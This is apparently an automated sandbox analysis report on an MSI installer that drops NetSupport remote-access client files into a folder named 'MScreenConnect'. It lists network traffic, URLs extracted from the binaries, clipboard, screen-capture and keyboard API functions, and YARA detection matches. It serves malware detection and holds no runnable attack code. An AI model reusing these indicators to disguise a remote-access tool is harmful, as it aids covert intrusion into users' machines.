Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 08 Nov 2024 17:59:59 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: keep-aliveCF-Ray: 8df775bfda5b3acd-DFWCF-Cache-Status: DYNAMICcf-apo-via: origin,hostReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QY%2Fl%2F%2FjoOpph1oDMhcDTCRKsebVyHvvToXDlnUgDq%2FsleONxcVpLnzArF4Vtn5zVhUMtMneMtWbC1RKTXuv7eni1l8HVLhLxI%2BEeYtaOYTL0qnI%2Bz59VzyWMOaWYkoIqxKf8jQTLhNIqHEns"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareserver-timing: cfL4;desc="?proto=TCP&rtt=1049&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 08 Nov 2024 17:59:59 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: keep-aliveCF-Ray: 8df775c599186b9a-DFWCF-Cache-Status: DYNAMICcf-apo-via: origin,hostReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1%2Bep3Pj55pfvTlWhv%2BaaCGd5rsOgBCQ34ugK1IAo38AO5rZB%2FpbErjuMPjyQ227gZAuXkw4I0WdRw%2Bhl7DiCFDV21I9Z7NWVNgln5cDuKzBey3SgDIGc52y%2BPPk1bxbUZrDFAmMPMmFLJD1T"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareserver-timing: cfL4;desc="?proto=TCP&rtt=1105&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 08 Nov 2024 18:00:00 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: keep-aliveCF-Ray: 8df775cb7ae14776-DFWCF-Cache-Status: DYNAMICcf-apo-via: origin,hostReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B6Vtq%2FtGmh0OVUIHUwV%2FTZYsVwArgck2CKP6RiyWhL2j4ZLEv9%2F68bGBZ9NzgAC8IAzOfX6nZmHvbtdRgqHvmq0JGzKlfiJfRP%2FDdMs2WdCzDvtL9qPGJ5wkyPV%2BtH3NabqPSBl%2B4hh3lHF4"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareserver-timing: cfL4;desc="?proto=TCP&rtt=1832&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0

Source: client32.exe, client32.exe, 00000003.00000002.4454042754.000000006CC9E000.00000002.00000001.01000000.00000008.sdmp, HTCTL32.DLL.1.dr	String found in binary or memory: http://%s/fakeurl.htm
Source: client32.exe, client32.exe, 00000003.00000002.4454042754.000000006CC9E000.00000002.00000001.01000000.00000008.sdmp, HTCTL32.DLL.1.dr	String found in binary or memory: http://%s/testpage.htm
Source: client32.exe, 00000003.00000002.4454042754.000000006CC9E000.00000002.00000001.01000000.00000008.sdmp, HTCTL32.DLL.1.dr	String found in binary or memory: http://%s/testpage.htmwininet.dll
Source: client32.exe, client32.exe, 00000006.00000002.2133725554.0000000011181000.00000002.00000001.01000000.00000004.sdmp, client32.exe, 00000008.00000002.2214810652.0000000011181000.00000002.00000001.01000000.00000004.sdmp, PCICL32.DLL.1.dr	String found in binary or memory: http://127.0.0.1
Source: client32.exe, 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmp, client32.exe, 00000006.00000002.2133725554.0000000011181000.00000002.00000001.01000000.00000004.sdmp, client32.exe, 00000008.00000002.2214810652.0000000011181000.00000002.00000001.01000000.00000004.sdmp, PCICL32.DLL.1.dr	String found in binary or memory: http://127.0.0.1RESUMEPRINTING
Source: Veeam.Backup.Model.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: Veeam.Backup.Model.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: Veeam.Backup.Model.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: Veeam.Backup.Model.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: 72BF1aHUKl.msi, 519b7a.msi.1.dr, 519b7c.msi.1.dr	String found in binary or memory: http://cevcsca2021.crl.certum.pl/cevcsca2021.crl0w
Source: 72BF1aHUKl.msi, 519b7a.msi.1.dr, 519b7c.msi.1.dr	String found in binary or memory: http://cevcsca2021.ocsp-certum.com07
Source: 72BF1aHUKl.msi, 519b7a.msi.1.dr, 519b7c.msi.1.dr	String found in binary or memory: http://crl.certum.pl/ctnca2.crl0l
Source: PCICHEK.DLL.1.dr, AudioCapture.dll.1.dr, pcicapi.dll.1.dr	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: 72BF1aHUKl.msi, 519b7a.msi.1.dr, 519b7c.msi.1.dr	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: HTCTL32.DLL.1.dr	String found in binary or memory: http://crl.globalsign.com/gs/gscodesignsha2g2.crl0
Source: 72BF1aHUKl.msi, 519b7a.msi.1.dr, 519b7c.msi.1.dr	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: HTCTL32.DLL.1.dr	String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: remcmdstub.exe.1.dr	String found in binary or memory: http://crl.sectigo.com/COMODOTimeStampingCA_2.crl0r
Source: PCICHEK.DLL.1.dr, AudioCapture.dll.1.dr	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: PCICHEK.DLL.1.dr, AudioCapture.dll.1.dr	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: remcmdstub.exe.1.dr, pcicapi.dll.1.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: remcmdstub.exe.1.dr, PCICHEK.DLL.1.dr, AudioCapture.dll.1.dr, pcicapi.dll.1.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: PCICL32.DLL.1.dr, HTCTL32.DLL.1.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: Veeam.Backup.Model.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: Veeam.Backup.Model.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: Veeam.Backup.Model.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: Veeam.Backup.Model.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: Veeam.Backup.Model.dll.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: remcmdstub.exe.1.dr	String found in binary or memory: http://crt.sectigo.com/COMODOTimeStampingCA_2.crt0#
Source: PCICHEK.DLL.1.dr, AudioCapture.dll.1.dr	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: PCICHEK.DLL.1.dr, AudioCapture.dll.1.dr	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: remcmdstub.exe.1.dr, pcicapi.dll.1.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: remcmdstub.exe.1.dr, PCICHEK.DLL.1.dr, AudioCapture.dll.1.dr, pcicapi.dll.1.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: client32.exe, client32.exe, 00000006.00000002.2133725554.0000000011181000.00000002.00000001.01000000.00000004.sdmp, client32.exe, 00000008.00000002.2214810652.0000000011181000.00000002.00000001.01000000.00000004.sdmp, PCICL32.DLL.1.dr	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
Source: client32.exe, 00000003.00000003.2336112737.0000000000BA9000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000002.4452829434.0000000000BA9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp%E
Source: client32.exe, 00000003.00000003.2336112737.0000000000BA9000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000002.4452829434.0000000000BA9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp9J
Source: client32.exe, 00000003.00000003.2336112737.0000000000B8A000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000002.4452809235.0000000000B8A000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000003.2336311881.0000000000B8A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp?
Source: client32.exe, 00000003.00000003.2336112737.0000000000BA9000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000002.4452829434.0000000000BA9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspCEEX
Source: client32.exe, 00000003.00000002.4452754375.0000000000B80000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000003.2336112737.0000000000B80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspO
Source: client32.exe, 00000003.00000003.2336112737.0000000000BA9000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000002.4452829434.0000000000BA9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspQEWX
Source: client32.exe, 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmp, client32.exe, 00000006.00000002.2133725554.0000000011181000.00000002.00000001.01000000.00000004.sdmp, client32.exe, 00000008.00000002.2214810652.0000000011181000.00000002.00000001.01000000.00000004.sdmp, PCICL32.DLL.1.dr	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)
Source: client32.exe, 00000003.00000003.2336112737.0000000000BA9000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000002.4452829434.0000000000BA9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspUJ
Source: client32.exe, 00000003.00000002.4452754375.0000000000B80000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000003.2336112737.0000000000B80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspache-Controlno-cache
Source: client32.exe, 00000003.00000003.2336112737.0000000000BA9000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000002.4452829434.0000000000BA9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspcJeY
Source: client32.exe, 00000003.00000003.2336112737.0000000000B8A000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000002.4452809235.0000000000B8A000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000003.2336311881.0000000000B8A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspg
Source: client32.exe, 00000003.00000003.2336112737.0000000000BA9000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000002.4452829434.0000000000BA9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspoEaX
Source: PCICHEK.DLL.1.dr, AudioCapture.dll.1.dr, pcicapi.dll.1.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: Veeam.Backup.Model.dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: Veeam.Backup.Model.dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: Veeam.Backup.Model.dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: Veeam.Backup.Model.dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: 72BF1aHUKl.msi, 519b7a.msi.1.dr, 519b7c.msi.1.dr	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: pcicapi.dll.1.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: PCICL32.DLL.1.dr, HTCTL32.DLL.1.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: HTCTL32.DLL.1.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g20
Source: 72BF1aHUKl.msi, 519b7a.msi.1.dr, 519b7c.msi.1.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: 72BF1aHUKl.msi, 519b7a.msi.1.dr, 519b7c.msi.1.dr	String found in binary or memory: http://repository.certum.pl/cevcsca2021.cer0
Source: 72BF1aHUKl.msi, 519b7a.msi.1.dr, 519b7c.msi.1.dr	String found in binary or memory: http://repository.certum.pl/ctnca2.cer09
Source: TCCTL32.DLL.1.dr, client32.exe.1.dr	String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: TCCTL32.DLL.1.dr, client32.exe.1.dr	String found in binary or memory: http://s2.symcb.com0
Source: HTCTL32.DLL.1.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g2.crt08
Source: 72BF1aHUKl.msi, 519b7a.msi.1.dr, 519b7c.msi.1.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: 72BF1aHUKl.msi, 519b7a.msi.1.dr, 519b7c.msi.1.dr	String found in binary or memory: http://subca.ocsp-certum.com02
Source: client32.exe.1.dr	String found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: TCCTL32.DLL.1.dr	String found in binary or memory: http://sv.symcb.com/sv.crl0f
Source: TCCTL32.DLL.1.dr, client32.exe.1.dr	String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: TCCTL32.DLL.1.dr, client32.exe.1.dr	String found in binary or memory: http://sv.symcd.com0&
Source: Veeam.Backup.Model.dll.1.dr	String found in binary or memory: http://tempuri.org/PrefetchFilesSpec.xsd
Source: Veeam.Backup.Model.dll.1.dr	String found in binary or memory: http://tempuri.org/RequestUpdateSpec.xsd
Source: Veeam.Backup.Model.dll.1.dr	String found in binary or memory: http://tempuri.org/RequestUpdateSpec.xsdKInvalid
Source: Veeam.Backup.Model.dll.1.dr	String found in binary or memory: http://tempuri.org/ResponseUpdateSpec.xsd
Source: PCICL32.DLL.1.dr, HTCTL32.DLL.1.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: PCICL32.DLL.1.dr, HTCTL32.DLL.1.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: PCICL32.DLL.1.dr, HTCTL32.DLL.1.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: 72BF1aHUKl.msi, 519b7a.msi.1.dr, 519b7c.msi.1.dr	String found in binary or memory: http://www.certum.pl/CPS0
Source: HTCTL32.DLL.1.dr	String found in binary or memory: http://www.crossteccorp.com
Source: Veeam.Backup.Model.dll.1.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: client32.exe, 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmp, client32.exe, 00000006.00000002.2133757091.00000000111CD000.00000004.00000001.01000000.00000004.sdmp, client32.exe, 00000008.00000002.2214849103.00000000111CD000.00000004.00000001.01000000.00000004.sdmp, PCICL32.DLL.1.dr	String found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp
Source: client32.exe, 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmp, client32.exe, 00000006.00000002.2133757091.00000000111CD000.00000004.00000001.01000000.00000004.sdmp, client32.exe, 00000008.00000002.2214849103.00000000111CD000.00000004.00000001.01000000.00000004.sdmp, PCICL32.DLL.1.dr	String found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp118
Source: PCICL32.DLL.1.dr	String found in binary or memory: http://www.netsupportsoftware.com
Source: client32.exe, 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmp, client32.exe, 00000006.00000002.2133757091.00000000111CD000.00000004.00000001.01000000.00000004.sdmp, client32.exe, 00000008.00000002.2214849103.00000000111CD000.00000004.00000001.01000000.00000004.sdmp, PCICL32.DLL.1.dr	String found in binary or memory: http://www.pci.co.uk/support
Source: client32.exe, 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmp, client32.exe, 00000006.00000002.2133757091.00000000111CD000.00000004.00000001.01000000.00000004.sdmp, client32.exe, 00000008.00000002.2214849103.00000000111CD000.00000004.00000001.01000000.00000004.sdmp, PCICL32.DLL.1.dr	String found in binary or memory: http://www.pci.co.uk/supportsupport
Source: TCCTL32.DLL.1.dr, client32.exe.1.dr	String found in binary or memory: http://www.symauth.com/cps0(
Source: TCCTL32.DLL.1.dr, client32.exe.1.dr	String found in binary or memory: http://www.symauth.com/rpa00
Source: Veeam.Backup.Model.dll.1.dr	String found in binary or memory: https://9.queue.core.chinacloudapi.cn
Source: TCCTL32.DLL.1.dr, client32.exe.1.dr	String found in binary or memory: https://d.symcb.com/cps0%
Source: TCCTL32.DLL.1.dr, client32.exe.1.dr	String found in binary or memory: https://d.symcb.com/rpa0
Source: Veeam.Backup.Model.dll.1.dr	String found in binary or memory: https://logging.googleapis.com/v2
Source: Veeam.Backup.Model.dll.1.dr	String found in binary or memory: https://manage.windowsazure.cn/publishsettings/#.chinacloudapp.cn
Source: Veeam.Backup.Model.dll.1.dr	String found in binary or memory: https://manage.windowsazure.com/PublishSettings/
Source: Veeam.Backup.Model.dll.1.dr	String found in binary or memory: https://management.azure.com/5https://login.windows.net/Ihttps://management.core.windows.net/Chttps:
Source: Veeam.Backup.Model.dll.1.dr	String found in binary or memory: https://management.chinacloudapi.cn/?https://login.chinacloudapi.cn/Shttps://management.core.chinacl
Source: Veeam.Backup.Model.dll.1.dr	String found in binary or memory: https://management.microsoftazure.de/Chttps://login.microsoftonline.de/Ihttps://management.core.clou
Source: Veeam.Backup.Model.dll.1.dr	String found in binary or memory: https://management.usgovcloudapi.net/Chttps://login.microsoftonline.us/Uhttps://management.core.usgo
Source: PCICHEK.DLL.1.dr, AudioCapture.dll.1.dr	String found in binary or memory: https://sectigo.com/CPS0
Source: remcmdstub.exe.1.dr	String found in binary or memory: https://sectigo.com/CPS0B
Source: remcmdstub.exe.1.dr, pcicapi.dll.1.dr	String found in binary or memory: https://sectigo.com/CPS0C
Source: remcmdstub.exe.1.dr, PCICHEK.DLL.1.dr, AudioCapture.dll.1.dr, pcicapi.dll.1.dr	String found in binary or memory: https://sectigo.com/CPS0D
Source: Veeam.Backup.Model.dll.1.dr	String found in binary or memory: https://storage.googleapis.com
Source: Veeam.Backup.Model.dll.1.dr	String found in binary or memory: https://vault.azure.cn
Source: Veeam.Backup.Model.dll.1.dr	String found in binary or memory: https://vault.azure.net
Source: Veeam.Backup.Model.dll.1.dr	String found in binary or memory: https://vault.usgovcloudapi.net-core.usgovcloudapi.netkhttps://manage.windowsazure.us/publishsetting
Source: 72BF1aHUKl.msi, 519b7a.msi.1.dr, 519b7c.msi.1.dr	String found in binary or memory: https://www.certum.pl/CPS0
Source: 72BF1aHUKl.msi, 519b7a.msi.1.dr, 519b7c.msi.1.dr, HTCTL32.DLL.1.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: HTCTL32.DLL.1.dr	String found in binary or memory: https://www.globalsign.com/repository/06
Source: Veeam.Backup.Model.dll.1.dr	String found in binary or memory: https://www.googleapis.com/compute/v1

Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710

Source: C:\ProgramData\MScreenConnect\client32.exe

Code function: 3_2_1101DBE0 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,

3_2_1101DBE0

Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 3_2_11031300 GetClipboardFormatNameA,SetClipboardData,	3_2_11031300
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 3_2_1101DBE0 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,	3_2_1101DBE0
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 6_2_11031300 GetClipboardFormatNameA,SetClipboardData,	6_2_11031300
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 6_2_1101DBE0 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,	6_2_1101DBE0

Source: C:\ProgramData\MScreenConnect\client32.exe

Code function: 3_2_11031080 IsClipboardFormatAvailable,GetClipboardData,GetClipboardFormatNameA,GetLastError,GlobalUnlock,

3_2_11031080

Source: C:\ProgramData\MScreenConnect\client32.exe

Code function: 3_2_11117290 _calloc,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,_malloc,_calloc,Sleep,GetTickCount,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetTickCount,WaitForSingleObject,_memset,_memset,_malloc,_malloc,_memset,_calloc,_calloc,GetSystemPaletteEntries,GetStockObject,SelectPalette,SelectPalette,SelectPalette,RealizePalette,_memset,SelectPalette,DeleteObject,CreatePalette,SelectPalette,RealizePalette,BitBlt,GetObjectA,GetBitmapBits,GetDIBits,_malloc,_free,GetTickCount,GetTickCount,WaitForSingleObject,GetTickCount,WaitForSingleObject,GetTickCount,CloseHandle,_free,_free,_free,_free,SelectObject,DeleteObject,DeleteObject,SelectPalette,DeleteObject,DeleteDC,ReleaseDC,_free,_free,_free,

3_2_11117290

Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 3_2_11106C70 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,		3_2_11106C70
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 6_2_11106C70 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,		6_2_11106C70

Source: Yara match	File source: 3.2.client32.exe.111a3f08.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.client32.exe.111a3f08.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.client32.exe.111a3f08.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2214810652.0000000011181000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
